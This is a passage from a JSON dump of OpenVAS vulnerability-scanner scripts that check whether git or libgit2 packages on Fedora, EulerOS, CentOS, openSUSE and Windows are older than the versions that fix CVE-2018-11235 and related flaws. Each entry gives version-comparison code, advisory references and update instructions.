script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"libgit2 on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-b10e54263a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AN3BUPV64POHW6JZCR2ILD4YRIHHKEEQ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"libgit2\", rpm:\"libgit2~0.26.4~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:40:17", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for git (EulerOS-SA-2018-1215)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181215", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181215", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1215\");\n script_version(\"2020-01-23T11:17:49+0000\");\n script_cve_id(\"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:17:49 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:17:49 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for git (EulerOS-SA-2018-1215)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1215\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1215\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'git' package(s) announced via the EulerOS-SA-2018-1215 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)\");\n\n script_tag(name:\"affected\", value:\"'git' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~1.8.3.1~14.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Git\", rpm:\"perl-Git~1.8.3.1~14.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:37:27", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for git (EulerOS-SA-2018-1216)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181216", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181216", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1216\");\n script_version(\"2020-01-23T11:17:50+0000\");\n script_cve_id(\"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:17:50 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:17:50 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for git (EulerOS-SA-2018-1216)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1216\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1216\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'git' package(s) announced via the EulerOS-SA-2018-1216 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)\");\n\n script_tag(name:\"affected\", value:\"'git' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~1.8.3.1~14.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Git\", rpm:\"perl-Git~1.8.3.1~14.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:27", "description": "Check the version of emacs-git", "cvss3": {}, "published": "2018-06-23T00:00:00", "type": "openvas", "title": "CentOS Update for emacs-git CESA-2018:1957 centos7", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882913", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882913", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2018_1957_emacs-git_centos7.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for emacs-git CESA-2018:1957 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882913\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-23 05:57:21 +0200 (Sat, 23 Jun 2018)\");\n script_cve_id(\"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for emacs-git CESA-2018:1957 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of emacs-git\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Git is a distributed revision control system with a decentralized\narchitecture. As opposed to centralized version control systems with a\nclient-server model, Git ensures that each working copy of a Git repository\nis an exact copy with complete revision history. This not only allows the\nuser to work on and contribute to projects without the need to have\npermission to push the changes to their official repositories, but also\nmakes it possible for the user to work with no network connection.\n\nSecurity Fix(es):\n\n * git: arbitrary code execution when recursively cloning a malicious\nrepository (CVE-2018-11235)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section.\");\n script_tag(name:\"affected\", value:\"emacs-git on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"CESA\", value:\"2018:1957\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2018-June/022924.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"emacs-git\", rpm:\"emacs-git~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"emacs-git-el\", rpm:\"emacs-git-el~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"git\", rpm:\"git~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"git-all\", rpm:\"git-all~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"git-bzr\", rpm:\"git-bzr~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"git-cvs\", rpm:\"git-cvs~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"git-daemon\", rpm:\"git-daemon~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"git-email\", rpm:\"git-email~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"git-gui\", rpm:\"git-gui~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"git-hg\", rpm:\"git-hg~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gitk\", rpm:\"gitk~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"git-p4\", rpm:\"git-p4~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"git-svn\", rpm:\"git-svn~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gitweb\", rpm:\"gitweb~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Git\", rpm:\"perl-Git~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Git-SVN\", rpm:\"perl-Git-SVN~1.8.3.1~14.el7_5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-09T14:49:35", "description": "Git is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-05-31T00:00:00", "type": "openvas", "title": "Git 2.13.x, 2.14.x, 2.15.x, 2.16.x, 2.17.x Multiple Vulnerabilities (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-11233"], "modified": "2019-10-07T00:00:00", "id": "OPENVAS:1361412562310113205", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113205", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Git 2.13.x, 2.14.x, 2.15.x, 2.16.x, 2.17.x Multiple Vulnerabilities (Windows)\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113205\");\n script_version(\"2019-10-07T14:34:48+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-07 14:34:48 +0000 (Mon, 07 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-31 14:37:56 +0200 (Thu, 31 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n\n script_name(\"Git 2.13.x, 2.14.x, 2.15.x, 2.16.x, 2.17.x Multiple Vulnerabilities (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_git_detect_win.nasl\");\n script_mandatory_keys(\"Git/Win/Ver\");\n\n script_tag(name:\"summary\", value:\"Git is prone to multiple vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - Code to sanity-check pathnames on NTFS can result in reading out-of-bounds memory\n\n - With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs\n 'git clone --recurse-submodules' because submodule 'names' are obtained from this file, and then appended\n to $GIT_DIR/modules, leading to directory traversal with '../' in a name.\n Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks\n are not obtained from a remote server (Remote Code Execution can occur)\");\n script_tag(name:\"affected\", value:\"Git versions through 2.13.6, 2.14.0 through 2.14.3, 2.15.0 through 2.15.1, 2.16.0 through 2.16.3 and 2.17.0.\");\n script_tag(name:\"solution\", value:\"Update to version 2.13.7, 2.14.4, 2.15.2, 2.16.4 or 2.17.1 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://marc.info/?l=git&m=152761328506724&w=2\");\n script_xref(name:\"URL\", value:\"https://securitytracker.com/id/1040991\");\n script_xref(name:\"URL\", value:\"https://blogs.msdn.microsoft.com/devops/2018/05/29/announcing-the-may-2018-git-security-vulnerability/\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:git_for_windows_project:git_for_windows\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! version = get_app_version( cpe: CPE, port: port ) ) exit( 0 );\n\nif( version_is_less( version: version, test_version: \"2.13.7\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"2.13.7\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"2.14.0\", test_version2: \"2.14.3\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"2.14.4\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"2.15.0\", test_version2: \"2.15.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"2.15.2\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"2.16.0\", test_version2: \"2.16.3\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"2.16.4\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_is_equal( version: version, test_version: \"2.17.0\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"2.17.1\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\n\nexit( 99 );\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-04T16:43:20", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-06-06T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for git (openSUSE-SU-2018:1553-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-11233"], "modified": "2020-06-03T00:00:00", "id": "OPENVAS:1361412562310851774", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851774", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851774\");\n script_version(\"2020-06-03T08:38:58+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-03 08:38:58 +0000 (Wed, 03 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-06 05:47:36 +0200 (Wed, 06 Jun 2018)\");\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for git (openSUSE-SU-2018:1553-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for fixes the following security issues:\n\n * path sanity-checks on NTFS can read arbitrary memory (CVE-2018-11233,\n boo#1095218)\n\n * arbitrary code execution when recursively cloning a malicious repository\n (CVE-2018-11235, boo#1095219)\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-557=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-557=1\");\n\n script_tag(name:\"affected\", value:\"git on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:1553-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-06/msg00004.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-arch\", rpm:\"git-arch~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-core\", rpm:\"git-core~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-core-debuginfo\", rpm:\"git-core-debuginfo~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-gnome-keyring\", rpm:\"git-credential-gnome-keyring~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-gnome-keyring-debuginfo\", rpm:\"git-credential-gnome-keyring-debuginfo~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-cvs\", rpm:\"git-cvs~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-daemon\", rpm:\"git-daemon~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-daemon-debuginfo\", rpm:\"git-daemon-debuginfo~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-debugsource\", rpm:\"git-debugsource~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-email\", rpm:\"git-email~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-gui\", rpm:\"git-gui~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-svn\", rpm:\"git-svn~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-svn-debuginfo\", rpm:\"git-svn-debuginfo~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-web\", rpm:\"git-web~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"gitk\", rpm:\"gitk~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-doc\", rpm:\"git-doc~2.13.7~13.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:38:54", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for git (EulerOS-SA-2019-1385)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2017-1000117"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191385", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191385", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1385\");\n script_version(\"2020-01-23T11:41:17+0000\");\n script_cve_id(\"CVE-2017-1000117\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 